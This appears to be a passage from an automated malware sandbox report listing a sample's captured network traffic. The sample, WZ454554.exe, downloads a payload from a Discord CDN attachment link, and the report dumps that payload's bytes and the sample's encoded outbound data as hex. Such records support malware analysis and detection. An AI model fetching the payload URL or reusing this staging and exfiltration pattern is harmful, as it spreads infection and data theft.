PUl1jtPRvkqyMPSaBjf97JEDkY4Us0O26oDkuBVLKHLY1~dYyu9eobe3DyYxNbxnSLB5ywvIu46A_V2k8JHFsSlv8rfQNxE1jyJEbtWCcSoGH4sKH~PXj69jVW78fToQJGgbo
                          Jan 13, 2022 20:23:55.043478966 CET13820OUTData Raw: 6c 6c 4d 4f 50 37 55 71 66 31 55 72 38 4c 74 69 57 45 57 52 53 36 6e 7a 7a 37 64 58 4c 69 53 45 68 4e 54 42 7e 45 56 37 59 78 47 31 42 6c 71 4c 4e 71 46 74 58 48 28 77 6e 50 62 76 58 4b 64 34 71 39 6f 6e 7e 4b 68 6c 28 6c 61 32 64 7a 41 4c 7e 37
                          Data Ascii: llMOP7Uqf1Ur8LtiWEWRS6nzz7dXLiSEhNTB~EV7YxG1BlqLNqFtXH(wnPbvXKd4q9on~Khl(la2dzAL~73EidyIqoKC34X_MCIQowTpKrPuQtrQFGOTg1QSi8oU3YbhQScEfFq4tca9u-QiKiZf4OlQD3zzEv0ndDlYSYLCwpW4eiuZxhHhUdPJJYhbd1m_KoVB0iULJcwDtK1DyMPSkuhyYU~3DqNE76CJN_Duf71WASiH0ZR
                          Jan 13, 2022 20:23:55.043626070 CET13823OUTData Raw: 67 51 75 6d 62 56 42 34 4e 30 63 78 49 6c 63 73 31 4b 7a 2d 31 45 74 5a 56 71 74 6d 38 61 4e 35 52 30 66 42 68 4d 45 76 76 76 52 65 69 2d 7a 72 57 33 32 41 48 37 65 72 61 72 48 50 4d 4e 67 4e 43 58 61 33 63 45 6e 62 74 39 54 6a 72 65 4f 61 41 33
                          Data Ascii: gQumbVB4N0cxIlcs1Kz-1EtZVqtm8aN5R0fBhMEvvvRei-zrW32AH7erarHPMNgNCXa3cEnbt9TjreOaA3gr8yicuV1AlquHSoVCc9XakiY9lXiD2pnPWL~00AXGGqzTBWP0KYI_5eR3hpe-j1DDd3(In9o0mLdoWeHvIAEd81Y6(m8Nj0H4fhKemMACLgDbwvRVJQy3FQ2z04Wm6rioPdQp(oQMltQYVSdnWkg2UYXbXCcXWhm
                          Jan 13, 2022 20:23:55.043637991 CET13829OUTData Raw: 36 34 54 79 49 73 63 49 34 77 79 39 37 68 35 77 70 78 58 6f 46 68 6f 73 59 66 51 2d 7e 50 46 6f 70 51 34 67 4d 36 31 53 31 61 70 53 4b 39 7e 73 61 55 66 74 4f 77 76 4a 28 52 38 6d 50 30 28 73 33 78 6d 4f 43 6f 58 49 44 59 50 79 76 52 48 35 6f 47
                          Data Ascii: 64TyIscI4wy97h5wpxXoFhosYfQ-~PFopQ4gM61S1apSK9~saUftOwvJ(R8mP0(s3xmOCoXIDYPyvRH5oGOEtZR2ylNYgaIqxYlO(vDugZ3uV2vDCjbxZvTs(jOuSNAW24x-r_w7iAKs3I7iZhwZWloy~j(iPg2F(-6fBM0kv9sesbJrTpfW97LGsefBCYMST_bVF7LOsElZ5H6Dw4SFL6MarbTSsKZuk9qJgEVhCkvUM01lmQK
                          Jan 13, 2022 20:23:55.043661118 CET13831OUTData Raw: 43 6d 61 68 55 79 28 66 76 44 28 4e 7e 53 75 36 4a 50 39 39 38 57 45 62 71 38 31 64 34 75 7a 44 69 56 31 46 51 62 63 62 36 30 6f 74 76 65 6f 73 36 66 61 43 61 4e 59 78 41 77 6d 61 6c 6d 65 59 71 62 7e 4d 63 5f 30 4e 71 6e 6e 7a 50 72 30 78 71 47
                          Data Ascii: CmahUy(fvD(N~Su6JP998WEbq81d4uzDiV1FQbcb60otveos6faCaNYxAwmalmeYqb~Mc_0NqnnzPr0xqGU2EBk0qA0QPbGacj5PwelNxVWnE4kCFk~FMkkY6uNYddPYPQYQyjIXjJXov5bmnvaCrvEYnaNAG3PyDAJZGvXS(dlq5W6LfS(W1tFn0jfuAt3vaIhrdvLjG0TNdPJasTuNZTK-10iEvbT5a7~a~7aG(aQIGl1E13s
                          Jan 13, 2022 20:23:55.043679953 CET13834OUTData Raw: 54 42 64 6a 45 69 39 30 71 61 59 66 57 55 43 4e 64 4c 61 4b 5a 4f 48 6f 70 49 7e 54 73 31 4c 39 76 78 76 64 78 6a 32 56 50 70 6e 55 63 67 28 4e 58 64 36 46 38 79 30 59 36 78 38 58 28 6c 41 7a 56 59 31 69 67 59 6a 36 61 56 77 65 6a 74 6c 54 65 32
                          Data Ascii: TBdjEi90qaYfWUCNdLaKZOHopI~Ts1L9vxvdxj2VPpnUcg(NXd6F8y0Y6x8X(lAzVY1igYj6aVwejtlTe2Cq666TI71eXOiZ~Vor6dz71kXSWNX1IdBxVev55XJciJPLM0ky(YaBI8Ql0c(M5b8xE9SeC5wAEU6b6GIFUq6JQ4cr5U9remvYCc8xxZ14zMtFbKxJBdf80dGj~Fj_SBKNXI7CHXo5d454QldOhf9Y0i8DpwsRQyZ
                          Jan 13, 2022 20:23:55.043724060 CET13842OUTData Raw: 70 4e 51 2d 4c 31 74 6f 44 62 78 53 6d 2d 61 61 5a 57 62 77 72 43 6c 78 32 33 37 53 6b 6f 72 70 75 4f 49 59 56 50 48 68 34 45 56 57 39 4a 58 41 4b 64 63 67 38 4f 31 6f 4a 57 41 70 46 58 56 71 39 45 73 34 43 5a 78 30 66 49 34 47 72 2d 61 51 35 4c
                          Data Ascii: pNQ-L1toDbxSm-aaZWbwrClx237SkorpuOIYVPHh4EVW9JXAKdcg8O1oJWApFXVq9Es4CZx0fI4Gr-aQ5L4WiniWBCmQbWoLaE6JaVXfAmrb~0vLWfyk62ONDjFMrHl_S9zw4K9mlLZ0IU9LRMi9QLT3SQNYIHAQPe9WGqzscIlojnqSmDm4VXFVqWyEiqslFWnoXBnDhxPaHWVmod8O3QTRjmmdyBdq3AIP5qNnxzc3UTWotbp
                          Jan 13, 2022 20:23:55.043776035 CET13845OUTData Raw: 79 6b 6e 38 4b 63 73 63 33 41 69 39 32 4d 4c 79 42 2d 44 4f 77 51 64 35 76 71 47 49 59 38 6a 63 35 78 6d 66 52 5a 34 44 77 79 4e 50 4f 46 30 30 4b 70 59 73 7a 4a 59 43 5a 69 77 48 46 54 54 62 4f 32 66 72 64 6b 74 55 73 78 55 48 42 54 67 70 68 33
                          Data Ascii: ykn8Kcsc3Ai92MLyB-DOwQd5vqGIY8jc5xmfRZ4DwyNPOF00KpYszJYCZiwHFTTbO2frdktUsxUHBTgph3eynA6BWfnATQlQ4HiDk1VK31ES7q2_ikE5ZRzM36SaFRKrg1OwkhxqKpz43rJol6s8sXdXDR(CpBWzfHuRxtsHhmCtmzxF3MLG1z0hce7bJLq6(oKgcOsASP6mJ3tNt8IIWYDUsn1AtxsCwcY0buF-MhrfUPzz1eU
                          Jan 13, 2022 20:23:55.063201904 CET13848OUTData Raw: 47 31 4b 70 37 72 57 6c 48 64 57 72 76 67 70 58 45 6b 30 51 36 38 37 58 66 49 53 58 67 54 48 50 58 68 41 71 5a 39 76 5a 33 67 78 72 47 38 77 34 65 72 73 6e 55 37 4c 71 4f 59 6b 63 4f 52 52 6e 74 6f 6f 49 53 36 31 47 69 56 30 46 7a 42 55 69 41 39
                          Data Ascii: G1Kp7rWlHdWrvgpXEk0Q687XfISXgTHPXhAqZ9vZ3gxrG8w4ersnU7LqOYkcORRntooIS61GiV0FzBUiA9mLVRhje7RxUVK0I0sU0wfxQhiwoKPFvf(a8Y1l8JQipNpwkzrkMwWRUNoIFVhp45VVNuj8HOAnRLFP8d5mIY7bhKxLviuqsFFau00_0eibso1Y9HKpYyFv5iEm28JjJPKYbYzemUVA9xxvck~KWcJyQYB3XrNwgwV
                          Jan 13, 2022 20:23:55.063245058 CET13853OUTData Raw: 6b 32 4d 68 68 67 39 32 33 49 69 63 30 39 35 73 31 77 7e 56 6a 6b 4c 72 45 4b 30 35 39 63 41 77 51 52 52 70 64 30 45 79 68 6e 6b 49 7a 64 36 45 36 32 4b 73 4a 46 6a 31 6b 6e 5a 75 78 77 66 48 33 5a 55 73 74 4e 62 62 4f 62 7e 58 4e 64 41 4e 61 5a
                          Data Ascii: k2Mhhg923Iic095s1w~VjkLrEK059cAwQRRpd0EyhnkIzd6E62KsJFj1knZuxwfH3ZUstNbbOb~XNdANaZBmF3LqPvZW(WwC~IUZeX27FwHqCzXjE9k01vD-ZwyLsVUM2h0cGns1(sgCC52cs7a7UDVTRHAN6jRMts18TUPo7WtpYI6CHUmtp5Ug9izPiNTS9MYrQS8RtvtBoScLlecCztVNFib_jFvnqrRY1s0Q6z4MvOdFHoy
                          Jan 13, 2022 20:23:55.063260078 CET13856OUTData Raw: 4c 75 55 4d 50 41 4e 69 75 65 36 68 4f 34 52 75 41 5a 52 45 62 57 74 6e 6e 6a 4f 6d 32 72 56 6a 62 51 78 52 51 46 69 57 66 49 74 47 77 56 54 52 5a 45 6c 71 49 5a 37 7a 6f 49 53 63 75 2d 70 37 52 37 58 31 4c 31 7e 56 4b 54 38 73 75 68 45 34 67 78
                          Data Ascii: LuUMPANiue6hO4RuAZREbWtnnjOm2rVjbQxRQFiWfItGwVTRZElqIZ7zoIScu-p7R7X1L1~VKT8suhE4gx4RcBM32Q3FRE8re3HV19XEetsWFNDlRF5CCOU0HRJabIXKb_6nhtn0ompXmXnzpVIrD205wnRHDFLS7qk8IkfZtNJeewhdbyfT0gumtchg906BE7QuoJLt682Ya53B0qvKA8q9I10q~yp5bumnydZPGOKnBI90Zr3
                          Jan 13, 2022 20:23:55.142203093 CET13960INHTTP/1.1 405 Not Allowed
                          Server: openresty
                          Date: Thu, 13 Jan 2022 19:23:55 GMT
                          Content-Type: text/html
                          Content-Length: 154
                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Q9ZUYZO8/a7e5BdDlvaZwJJtx0FbiRvpYdiZ7D/aCsoMoi5qB+aQaBHkMGmhT3JB5UzlsiLB6/R1RX4oqybO9g
                          Via: 1.1 google
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.349746162.159.130.233443C:\Users\user\Desktop\WZ454554.exe
                          TimestampkBytes transferredDirectionData
                          2022-01-13 19:22:17 UTC0OUTGET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1
                          User-Agent: lVali
                          Host: cdn.discordapp.com
                          2022-01-13 19:22:17 UTC0INHTTP/1.1 200 OK
                          Date: Thu, 13 Jan 2022 19:22:17 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 488448
                          Connection: close
                          CF-Ray: 6cd0fe153c0d698b-FRA
                          Accept-Ranges: bytes
                          Age: 21537
                          Cache-Control: public, max-age=31536000
                          Content-Disposition: attachment;%20filename=Hyrzbcwcasllzbwmlqsydewtjitxnzf
                          ETag: "6ce484ddb0699821883415a6a3c03422"
                          Expires: Fri, 13 Jan 2023 19:22:17 GMT
                          Last-Modified: Thu, 13 Jan 2022 12:45:05 GMT
                          Vary: Accept-Encoding
                          CF-Cache-Status: HIT
                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                          x-goog-generation: 1642077905426119
                          x-goog-hash: crc32c=ezqS6w==
                          x-goog-hash: md5=bOSE3bBpmCGINBWmo8A0Ig==
                          x-goog-metageneration: 1
                          x-goog-storage-class: STANDARD
                          x-goog-stored-content-encoding: identity
                          x-goog-stored-content-length: 488448
                          X-GUploader-UploadID: ADPycdvRzXtsPBcamJvr00nxQdLhRJEMoAYpY8SiWiAVO9bYx2AneSL0MYtS-kyeIcV-aXT9cMB6Wue_WC7NzP4DAPhWzq96GQ
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          2022-01-13 19:22:17 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 25 32 46 45 6c 59 4a 7a 76 34 44 6c 71 59 79 63 4f 37 33 36 72 56 31 52 47 62 59 64 46 44 55 25 32 42 74 6e 45 38 45 44 71 76 65 50 51 57 66 50 49 4e 36 6f 5a 32 6f 69 6d 4e 4c 35 42 52 6c 4e 4d 63 54 44 4f 6c 69 52 37 50 51 58 63 68 6c 69 6e 6a 34 70 76 76 25 32 42 66 50 39 67 4f 7a 69 38 58 44 7a 53 63 76 36 33 38 57 57 4b 75 71 66 31 76 46 4e 4b 36 55 37 77 33 72 6a 6f 47 4e 4c 45 79 36 34 45 4b 30 6f 74 48 33 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FElYJzv4DlqYycO736rV1RGbYdFDU%2BtnE8EDqvePQWfPIN6oZ2oimNL5BRlNMcTDOliR7PQXchlinj4pvv%2BfP9gOzi8XDzScv638WWKuqf1vFNK6U7w3rjoGNLEy64EK0otH3Q%3D%3D"}],"group":"cf-nel","max_age":
                          2022-01-13 19:22:17 UTC1INData Raw: 18 da 04 39 22 f7 4a 5b f6 c6 57 ec 36 9e 95 6a 0a 39 28 89 53 db 8c ce 77 a1 05 b7 39 27 6e 03 b6 bc 46 4a 4f d3 fa c1 d4 73 af 2f 14 d5 ef a1 14 d3 f5 4f d3 ff 5d e6 22 fd 51 df 91 68 1e f2 d8 01 a4 9a f9 4b cf e2 1b 6d 90 e2 18 dc 1f 74 30 95 7c 33 1d 6c 16 c8 64 0b 49 cd ea 2f 00 30 8a de 1d 61 fa d5 fe ca 60 72 2d 0f 4d d3 eb a8 84 cb e7 ae ad 23 74 38 a3 1f 65 83 4e 55 f4 dc 17 5d f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f1 b3 3d 2b 03 af 3b 32 8e e5 ad 2e 89 53 de 03 a9 10 c2 51 df 94 ff 44 a6 90 e8 20 ea 2a 84 dc 08 37 28 84 c8 62 11 55 fc d1 f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f1 b3 3d 2b 03 af 3b 32 8e e5 ad 2e 89 53 de 03 a9 10 c2 51 df 94 ff 44 a6 90 e8 20 ea 2a 84 dc 2d 2e ac 8a c9 f7 58
                          Data Ascii: 9"J[W6j9(Sw9'nFJOs/O]"QhKmt0|3ldI/0a`r-M#t8eNU]^|;:%sI~6{=+;2.SQD *7(bU^|;:%sI~6{=+;2.SQD *-.X
                          2022-01-13 19:22:17 UTC2INData Raw: 82 5f 6b 1f f7 d8 8a 47 5c f5 d7 06 af a5 86 4d 5a e2 82 5d 78 b5 ba cc e5 23 e6 bd 4c d7 1e 78 a0 00 b0 2f 8a 54 e3 03 2a 06 b5 a4 0d cd 68 8b c4 de 99 ff ce e1 18 47 59 64 86 48 c8 fa 57 66 94 72 ba d6 9e 1a 6c 96 70 a0 11 ce e1 0b ce fe 40 29 93 ee a8 1f eb 31 94 72 bc d4 f2 4f 4e db 03 28 00 bb 59 7f d2 f6 54 fd db 16 45 40 36 18 52 db 0c 4d 55 6e 80 5a ed 2e 11 c4 d9 0c 45 51 59 77 37 a9 81 da 8f e6 a7 85 d2 e1 08 a7 9e 1e 7b 24 77 26 79 37 a7 90 6c 9e 07 33 82 59 61 64 94 61 79 3a 35 80 50 da 8a 48 de 8d ea b1 b0 29 8e 7f d8 95 fa 4b 4a c5 45 5b 68 81 cc ee af ae 20 6d 03 36 04 bd 4c d6 84 42 30 17 c8 fb dc 9c 03 2e 0e 42 22 7e a2 13 d0 f5 c7 7e a7 82 5d 6a 81 c5 4f 5b 7d 27 fb d6 9d 8f ec a0 0c 41 a4 00 bb 54 fc 52 c4 c0 df 07 2a 04 a2 04 af b5 b0
                          Data Ascii: _kG\MZ]x#Lx/T*hGYdHWfrlp@)1rON(YTE@6RMUnZ.EQYw7{$w&y7l3Yaday:5PH)KJE[h m6LB0.B"~~]jO[}'ATR*
                          2022-01-13 19:22:17 UTC4INData Raw: 49 58 e8 a0 00 a7 82 5f 6b 1f f7 d8 8a 47 5c f5 d7 06 af a5 86 4d 5a e2 82 5d 78 b5 ba cc e5 23 e6 bd 4c d7 1e 78 a0 00 b0 2f 8a 54 e3 03 2a 06 b5 a4 0d cd 68 8b c4 de 99 ff ce e1 18 47 59 64 86 48 c8 fa 57 66 94 72 ba d6 9e 1a 6c 96 70 a0 11 ce e1 0b ce fe 40 29 93 ee a8 1f eb 31 94 72 bc d4 f2 4f 4e db 03 28 00 bb 59 7f d2 f6 54 fd db 16 45 40 36 18 52 db 0c 4d 55 6e 80 5a ed 2e 11 c4 d9 0c 45 51 59 77 37 a9 81 da 8f e6 a7 85 d2 e1 08 a7 9e 1e 7b 24 77 26 79 37 a7 90 6c 9e 07 33 82 59 61 64 94 61 79 3a 35 80 50 da 8a 48 de 8d ea b1 b0 29 8e 7f d8 95 fa 4b 4a c5 45 5b 68 81 cc ee af ae 20 6d 03 36 04 bd 4c d6 84 42 30 17 c8 fb dc 9c 03 2e 0e 42 22 7e a2 13 d0 f5 c7 7e a7 82 5d 6a 81 c5 4f 5b 7d 27 fb d6 9d 8f ec a0 0c 41 a4 00 bb 54 fc 52 c4 c0 df 07 2a
                          Data Ascii: IX_kG\MZ]x#Lx/T*hGYdHWfrlp@)1rON(YTE@6RMUnZ.EQYw7{$w&y7l3Yaday:5PH)KJE[h m6LB0.B"~~]jO[}'ATR*
                          2022-01-13 19:22:17 UTC5INData Raw: 89 d4 e3 16 58 f2 49 58 e8 a0 00 a7 82 5f 6b 1f f7 d8 8a 47 5c f5 d7 06 af a5 86 4d 5a e2 82 5d 78 b5 ba cc e5 23 e6 bd 4c d7 1e 78 a0 00 b0 2f 8a 54 e3 03 2a 06 b5 a4 0d cd 68 8b c4 de 99 ff ce e1 18 47 59 64 86 48 c8 fa 57 66 94 72 ba d6 9e 1a 6c 96 70 a0 11 ce e1 0b ce fe 40 29 93 ee a8 1f eb 31 94 72 bc d4 f2 4f 4e db 03 28 00 bb 59 7f d2 f6 54 fd db 16 45 40 36 18 52 db 0c 4d 55 6e 80 5a ed 2e 11 c4 d9 0c 45 51 59 77 37 a9 81 da 8f e6 a7 85 d2 e1 08 a7 9e 1e 7b 24 77 26 79 37 a7 90 6c 9e 07 33 82 59 61 64 94 61 79 3a 35 80 50 da 8a 48 de 8d ea b1 b0 29 8e 7f d8 95 fa 4b 4a c5 45 5b 68 81 cc ee af ae 20 6d 03 36 04 bd 4c d6 84 42 30 17 c8 fb dc 9c 03 2e 0e 42 22 7e a2 13 d0 f5 c7 7e a7 82 5d 6a 81 c5 4f 5b 7d 27 fb d6 9d 8f ec a0 0c 41 a4 00 bb 54 fc
                          Data Ascii: XIX_kG\MZ]x#Lx/T*hGYdHWfrlp@)1rON(YTE@6RMUnZ.EQYw7{$w&y7l3Yaday:5PH)KJE[h m6LB0.B"~~]jO[}'AT
                          2022-01-13 19:22:17 UTC6INData Raw: 91 51 72 a1 86 4c b9 e6 1a c1 15 d2 58 b8 39 39 ea b1 50 82 2e ad df 7a 7b 3e 2c a7 ce e6 37 c9 7e 56 2e 7f 2a 95 fc 52 df b7 80 b8 16 cc ae 52 4f b8 22 d1 cd 04 b1 be 67 ea aa 87 68 ee 23 9a 03 4f c6 3f a5 f1 4d 20 74 6c 69 19 dc 1d e0 12 4a 6f f9 d6 0d 34 0f 5a ba bd bf 28 17 7d 88 48 63 71 a4 9e 6a ee 7e 57 67 72 72 df 04 d3 a2 bc db c3 79 4a b0 fc 36 db 78 b5 65 38 5f 1a bd 8b f8 32 62 45 af 08 86 9b fd a9 37 46 d7 a5 a6 b9 7e 6f 05 59 b4 27 99 17 1b 91 59 b6 57 84 9d ed 87 0e 26 6f a6 76 01 4f 58 4a 7e bc 61 9f 98 20 cb f9 21 8f 1a 50 c7 82 20 c9 74 fc de 07 82 24 db 6f 3d d1 e7 52 ad 31 75 39 de ea d4 ea 5c 76 b5 bd f3 05 59 e6 7e 08 a9 dd 66 7c 9f 26 96 69 33 1a 1c 96 de ea 1f 00 1e b1 f1 2d d5 31 d0 14 6b 57 b8 e3 08 5e 42 1e fe c9 6f 77 8d ee 03
                          Data Ascii: QrLX99P.z{>,7~V.*RRO"gh#O?M tliJo4Z(}Hcqj~WgrryJ6xe8_2bE7F~oY'YW&ovOXJ~a !P t$o=R1u9\vY~f|&i3-1kW^Bow
                          2022-01-13 19:22:17 UTC8INData Raw: a8 b6 2e 0a b1 fc 72 81 10 89 69 d4 f8 41 a9 f2 b1 39 fc 80 f5 13 d3 7b 2c bc ac 5a 6c 43 04 7e ad ae 37 df 0b ca 8c 84 f0 62 94 7a b7 da 4f 98 d2 3e d6 52 d0 fc 43 f8 b9 c8 5f bf bf 8e 68 9c 0a e2 5f a5 37 6f af 6e 8f ef 3c af d1 0f 37 7c 50 14 5c e4 a1 2b 18 fa dd cb 85 e4 b6 2b 85 b0 2c 0c 23 31 71 0f cc ea bb 8f 4e 4c 52 19 6e aa 2b 95 e5 46 cb 61 19 17 60 ce fb cf 62 09 5a 92 eb e8 1c 55 72 ab ae b2 8c eb 5a 27 4f 71 32 00 a5 20 50 f2 6c 54 53 6e 92 7e a8 92 6f 19 e7 e2 2a 3d b8 28 1d bc 4a 35 70 7b 8c 4f 59 61 77 1b 3b 71 9e c6 31 96 73 33 87 43 fd 90 61 a4 f4 57 63 1d fe 2f e3 78 c3 94 d7 0d d6 9e 02 0f 7f 7d 48 1b 0e 40 37 ab b5 f8 be 35 de 4c 3f b2 3f ba cd 9a 1d 87 51 84 f5 d5 71 2d 87 29 f1 5b f8 97 40 30 1f fd cf bb 13 81 fa 96 93 99 fa 45 4a
                          Data Ascii: .riA9{,ZlC~7bzO>RC_h_7on<7|P\++,#1qNLRn+Fa`bZUrZ'Oq2 PlTSn~o*=(J5p{OYaw;q1s3CaWc/x}H@75L??Qq-)[@0EJ
                          2022-01-13 19:22:17 UTC9INData Raw: b0 97 dc 9f 86 4d 6a 71 c6 4d 95 4e e4 a1 8d ea 84 89 00 12 96 c8 d3 6e 9d 9d 55 20 29 a5 49 a7 bc cf 66 95 f4 3d d1 ac f3 74 9a 7e a3 83 c5 45 4a c2 1c d6 ac 20 6f 12 b7 bf 53 67 d1 9e 34 1c 71 2f 55 3f e4 86 93 58 ce e1 0b c6 79 bb b3 a4 de 3c 26 60 f1 28 05 e4 7c 07 ff 31 8e 61 6c 85 b8 55 00 c7 aa 93 f9 c2 c1 5f 5e 23 31 da 57 82 42 34 0b cc 45 c9 ef 34 c4 30 15 d4 eb 30 5c 70 25 11 15 3e 2e 0f da 9a 3d 28 81 98 bc 79 3b a2 00 a8 99 9c 76 22 b6 cb 71 25 f6 43 aa 86 c3 15 09 87 b4 27 f4 49 8c 96 bc 94 ba 28 7b 2d 95 e1 78 7e 7c 19 1e d1 0c 45 4d 59 97 f0 af 8a 8f 5e 8b db 1f fe a5 bb 6b 8a 87 3f d1 67 03 25 1a 39 fa 5a 20 9e 6d 19 c9 71 d8 e6 c3 be 13 7d 55 69 05 24 41 0e fc c9 a4 a9 14 5f 67 1b c0 0f 06 e7 e3 b1 30 11 df 07 84 e5 8a 3a f7 24 f5 d4 e1
                          Data Ascii: MjqMNnU )If=t~EJ oSg4q/U?Xy<&`(|1alU_^#1WB4E400\p%>.=(y;v"q%C'I({-x~|EMY^k?g%9Z mq}Ui$A_g0:$
                          2022-01-13 19:22:17 UTC10INData Raw: 01 fe b2 30 01 3c 39 f5 27 95 ee 62 3f bc c1 54 ed c7 00 9a de 51 e5 2b 9e 09 2a ac f1 ce 6d cf c4 db 10 4b 5a e7 24 7a be 18 e5 31 9a 74 b6 a9 a6 53 b0 f7 77 22 65 12 4e ed 22 51 03 e9 cb 75 25 f2 55 43 63 0c 5c 36 ef 4c d9 1a 6a fe 09 84 63 cd dc f6 5f 71 27 50 c5 fa 97 2b 6d 60 f7 dc 8f 47 27 0a 31 4e 38 42 2e 1d ea 3e 53 4c 78 75 ce 89 d1 77 3a a6 27 56 fc 92 da e7 2f 82 50 83 de 8a f5 0e fd be c4 c6 ce 49 46 78 d6 5a 5a 16 4d 5d 7a 6b 05 64 6a 5a 5e 76 be da 87 cf d0 bf 13 11 7c 31 9e 10 5c 99 95 a2 c6 1b 55 e0 8c 49 54 f5 6a 6e 20 b5 0c b9 4c dc 86 b6 37 85 6d da 65 8d e4 b4 28 d0 f6 ac 15 0c a5 7c b2 2c 1f 56 21 c8 58 29 3a 99 eb 2c 0e 88 fd b3 23 29 6f f0 ba ce e7 27 a9 59 35 42 d5 94 61 77 26 32 28 03 38 fb 6a 7b 32 19 d3 71 4f 3b e6 7f 77 4f 5e
                          Data Ascii: 0<9'b?TQ+*mKZ$z1tSw"eN"Qu%UCc\6Ljc_q'P+m`G'1N8B.>SLxuw:'V/PIFxZZM]zkdjZ^v|1\UITjn L7me(|,V!X):,#)o'Y5Baw&2(8j{2qO;wO^
                          2022-01-13 19:22:17 UTC12INData Raw: 3f 4e 01 98 0b d6 9e 19 5a 3d 17 86 8d 5a 89 c0 df 08 22 56 0b c4 1d 54 86 57 69 1a bb 6a 3f 90 bf f3 ae 3b ac 3b dd 30 8e 9c dd ff ad a7 8d fc e2 39 bb 51 8d 56 1c 62 9d 91 f6 6f 1f 55 ad 17 5c f1 3c 23 98 01 11 7a 6b fd 53 5f 6d 14 d1 6d 86 3a eb 85 4e c2 c4 dc 25 c9 81 86 9d 2c 8b c0 dc 9a 9c d8 9a c4 12 a2 fc 52 cf 60 87 3c ea 8d 2a b6 cb 63 17 d6 bc dd b6 11 10 a1 31 9d 93 e1 3e e5 12 ed eb da 67 09 2d 8b be 61 35 74 70 48 74 ad b4 26 b7 c9 e2 5d b2 83 79 38 2a 05 84 24 3a 93 28 f0 c6 dd 1d e3 1d e3 43 1a be 70 da 9f 82 4a 97 7f 21 e8 7c 56 b8 2e 13 c1 17 96 c5 55 a5 2e 5a ec bf 44 b9 fc 21 e0 4e 6e cd 6a 80 51 13 bc 80 81 1b 0f 96 61 71 29 ed 1b d1 e6 6a 62 cc ef 2f 84 c0 b9 38 38 fb 7c fe 53 4a dc e7 cb 59 25 3b 10 00 a7 84 5b d3 3a 1d 71 e6 0a e3
                          Data Ascii: ?NZ=Z"VTWij?;;09QVboU\<#zkS_mm:N%,R`<*c1>g-a5tpHt&]y8*$:(CpJ!|V.U.ZD!NnjQaq)jb/88|SJY%;[:q
                          2022-01-13 19:22:17 UTC13INData Raw: 54 96 94 64 41 98 0c fa 64 83 c6 c2 c9 b7 69 76 19 e0 8d ee aa 3d d5 63 a1 79 52 7f 83 be 6c 7a bc 65 03 f3 f3 b9 b1 9f 88 42 33 87 10 84 3e 8c 63 14 45 45 5b 19 dd 87 20 14 cd 2e 67 a8 01 f6 7f b4 c6 e3 10 40 37 a6 d8 40 5e 12 6f 15 cc f6 59 1c 70 0a 4c ad 0e 18 2d 2c 07 ea 8f 95 44 1c 79 3f b9 4b 9d 54 98 94 55 62 82 50 d6 e0 90 c0 26 15 42 6a e6 36 1c a6 2c 71 c9 41 a9 80 4d 53 84 96 1d 59 54 ee b0 23 f5 a0 1c f2 c5 3b 3b 1c 04 1c 77 fd f9 a5 76 84 50 c9 66 9d 5f bb 3d 1a 4f 5e f9 cf 75 5a e5 ca 6a fc 4a c3 54 e6 08 eb 5e 9d 6d 65 19 c0 d4 55 20 0a 31 a7 03 6e ec 52 24 03 51 84 ec df 17 aa 2a 0c 81 e3 75 bf 7c 61 66 f7 7e 90 74 b5 ab a1 26 97 60 e6 1f d2 f9 cb 6a 80 cf 5b d3 56 23 f1 5c 18 66 89 de 96 6c 3a 44 9a 63 e9 15 db 0b c9 63 cc c0 ac a4 31 37
                          Data Ascii: TdAdiv=cyRlzeB3>cEE[ .g@7@^oYpL-,Dy?KTUbP&Bj6,qAMSYT#;;wvPf_=O^uZjJT^meU 1nR$Q*u|af~t&`j[V#\fl:Dcc17
